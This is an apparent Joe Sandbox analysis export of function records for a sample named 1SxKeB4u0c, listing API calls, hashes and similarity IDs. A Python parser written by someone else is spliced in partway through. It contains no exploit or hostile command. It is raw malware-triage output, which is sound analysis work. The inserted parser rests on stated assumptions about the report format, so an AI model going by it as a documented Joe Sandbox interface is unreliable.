                                                                              • Opcode Fuzzy Hash: 88aa62d9e1e5a7c44cda5740427ce94969e3d026dc5a5533a65a85ed07d2a8cb
                                                                              • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                                                                              • GetLastError.KERNEL32 ref: 0046B550
                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                              • API String ID: 4194297153-14809454
                                                                              • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                                              • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                                                                              • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                                              • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                                                                              • GetDlgCtrlID.USER32 ref: 0045901F
                                                                              • GetParent.USER32 ref: 0045903B
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                                                                              • GetDlgCtrlID.USER32(?), ref: 00459047
                                                                              • GetParent.USER32(?), ref: 00459063
                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 1536045017-1403004172
                                                                              • Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                                              • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                                                                              • Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                                              • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                                                                              • GetDlgCtrlID.USER32 ref: 00459108
                                                                              • GetParent.USER32 ref: 00459124
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                                                                              • GetDlgCtrlID.USER32(?), ref: 00459130
                                                                              • GetParent.USER32(?), ref: 0045914C
                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 1536045017-1403004172
                                                                              • Opcode ID: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                                              • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                                                                              • Opcode Fuzzy Hash: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                                              • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                                                                              APIs
                                                                              • GetParent.USER32 ref: 0045916F
                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                                                                              • _wcscmp.LIBCMT ref: 00459196
                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                              • API String ID: 1704125052-3381328864
                                                                              • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                                              • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                                                                              • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                                              • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004611F0
                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                              • String ID:
                                                                              • API String ID: 2156557900-0
                                                                              • Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                                              • Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
                                                                              • Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                                              • Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
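The function records above follow one fixed layout (an "APIs" list of `Name.MODULE(args), ref: ADDR` lines, then "Memory Dump Source", "Joe Sandbox IDA Plugin" and "Similarity" metadata). The parser below is an added example for turning that layout into structured objects so records can be searched for API combinations or clustered by API String ID; it is not part of the Joe Sandbox report or of Joe Security's tooling. `SAMPLE` is a constructed excerpt copied from two of the records on this page (the AttachThreadInput and CoCreateInstance functions), and the regexes, class names and helper names are assumptions about the layout, not a Joe Sandbox API.

```python
"""Parse Joe Sandbox IDA-plugin function records into structured data.

Added example; not part of the Joe Sandbox report or of Joe Security's code.
SAMPLE is a constructed excerpt in the same layout as the records on this
page. Regexes, class and helper names are assumptions about that layout.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample: two records in the page's format, one with a subcall line
# and one "Associated" line carrying the "Download File" link residue.
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 004611F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
• GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
APIs
  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
• CoInitialize.OLE32 ref: 00478403
• CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
• IIDFromString.OLE32(?,?), ref: 004784E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
• Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
# "• [Part of subcall function XXXX: ]Name.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s+)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$")
# "• Key: value" metadata lines; the key stops at the first colon.
FIELD_RE = re.compile(r"^•\s+(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                      # address of the call site
    subcall_of: int | None = None # set for "Part of subcall function" lines


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)
    associated: list[str] = field(default_factory=list)

    @property
    def api_string_id(self) -> str:
        return self.fields.get("API String ID", "")

    @property
    def strings(self) -> list[str]:
        # "String ID" joins referenced strings with "$"; empty means none.
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    def api_names(self) -> set[str]:
        return {c.name for c in self.apis if c.subcall_of is None}


def parse_records(text: str) -> list[FunctionRecord]:
    """Each "APIs" header starts a new record; bullets below it are parsed by section."""
    records: list[FunctionRecord] = []
    current, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m and section == "APIs":
            args = m.group("args").split(",") if m.group("args") else []
            sub = m.group("sub")
            current.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                        int(m.group("ref"), 16),
                                        int(sub, 16) if sub else None))
            continue
        m = FIELD_RE.match(line)
        if m:
            # Strip the "Download File" link text the HTML export leaves on dump names.
            value = re.sub(r"\s*Download File$", "", m.group("value")).strip()
            if m.group("key") == "Associated":
                current.associated.append(value)
            else:
                current.fields[m.group("key")] = value
    return records


def call_sequence(rec: FunctionRecord) -> list[str]:
    """The function's own calls (subcall lines excluded) in address order, as MODULE!Name."""
    own = sorted((c for c in rec.apis if c.subcall_of is None), key=lambda c: c.ref)
    return [f"{c.module}!{c.name}" for c in own]


def functions_calling(records: list[FunctionRecord], required: set[str]) -> list[FunctionRecord]:
    """Records whose own API set covers every name in `required` (hunting for combinations)."""
    return [r for r in records if required <= r.api_names()]


def index_by_api_string_id(records: list[FunctionRecord]) -> dict[str, list[FunctionRecord]]:
    idx: dict[str, list[FunctionRecord]] = defaultdict(list)
    for r in records:
        idx[r.api_string_id].append(r)
    return dict(idx)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r.api_string_id, call_sequence(r), r.strings)
    hits = functions_calling(recs, {"GetForegroundWindow", "AttachThreadInput"})
    print("records with GetForegroundWindow + AttachThreadInput:", [h.api_string_id for h in hits])
```

Feed it the text of a whole "Execution Graph" export and `index_by_api_string_id` groups functions that Joe Sandbox considers API-equivalent across samples, while `functions_calling` lets you pull out, for example, every function that combines GetForegroundWindow with AttachThreadInput as the record above does.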
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$_memset
                                                                              • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                              • API String ID: 2862541840-2080382077
                                                                              • Opcode ID: 5e45a4bc97ccb967f3a94fe0c7eba0d1116f12234079cc91aabcb7686965c87b
                                                                              • Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
                                                                              • Opcode Fuzzy Hash: 5e45a4bc97ccb967f3a94fe0c7eba0d1116f12234079cc91aabcb7686965c87b
                                                                              • Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
                                                                              APIs
                                                                              • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ChildEnumWindows
                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                              • API String ID: 3555792229-1603158881
                                                                              • Opcode ID: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
                                                                              • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                                                                              • Opcode Fuzzy Hash: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
                                                                              • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
                                                                              APIs
                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                                                                                • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                                                                                • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                                                                                • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                                                                              • GetDC.USER32 ref: 0043CD32
                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                              • String ID: U
                                                                              • API String ID: 4009187628-3372436214
                                                                              • Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                                              • Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
                                                                              • Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                                              • Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
                                                                              APIs
                                                                              • RtlDecodePointer.NTDLL(00000000), ref: 02F51A3E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: DecodePointer
                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                              • API String ID: 3527080286-3064271455
                                                                              • Opcode ID: d863527aeb9731c7e5306ab30153aa2dd9aa1dbeaecc665f4d69bdafe21087d7
                                                                              • Instruction ID: d1e04d163ae1afb6aecbf0e3eb932540c18bc771199ca803d31c2d7759805ee4
                                                                              • Opcode Fuzzy Hash: d863527aeb9731c7e5306ab30153aa2dd9aa1dbeaecc665f4d69bdafe21087d7
                                                                              • Instruction Fuzzy Hash: 0C517071E0092ADBDF109F68DA4C6EFBBB0FF49394F100185DB89A7254DB35A924CB64
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                                                                              • SysFreeString.OLEAUT32(?), ref: 00478F00
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                              • String ID:
                                                                              • API String ID: 560350794-0
                                                                              • Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                                              • Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
                                                                              • Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                                              • Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0047F6B5
                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F848
                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F86C
                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8AC
                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8CE
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047FA4A
                                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0047FA7C
                                                                              • CloseHandle.KERNEL32(?), ref: 0047FAAB
                                                                              • CloseHandle.KERNEL32(?), ref: 0047FB22
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                              • String ID:
                                                                              • API String ID: 4090791747-0
                                                                              • Opcode ID: d19b129d984be36d3a078d17f6a4549c2e0840106d9fd9193167eaff5074c24f
                                                                              • Instruction ID: 06b6fb47819207378a011b81351d7d70f99dbcb89b467e7706fbe8a6ff9703be
                                                                              • Opcode Fuzzy Hash: d19b129d984be36d3a078d17f6a4549c2e0840106d9fd9193167eaff5074c24f
                                                                              • Instruction Fuzzy Hash: D8E194716042009FC714EF25C451BAA7BE1BF85314F14856EF8999B3A2DB38EC49CB5A
                                                                              APIs
                                                                                • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                                                                • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                                                                • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                                                                              • _wcscmp.LIBCMT ref: 00464D5A
                                                                              • MoveFileW.KERNEL32(?,?), ref: 00464D75
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
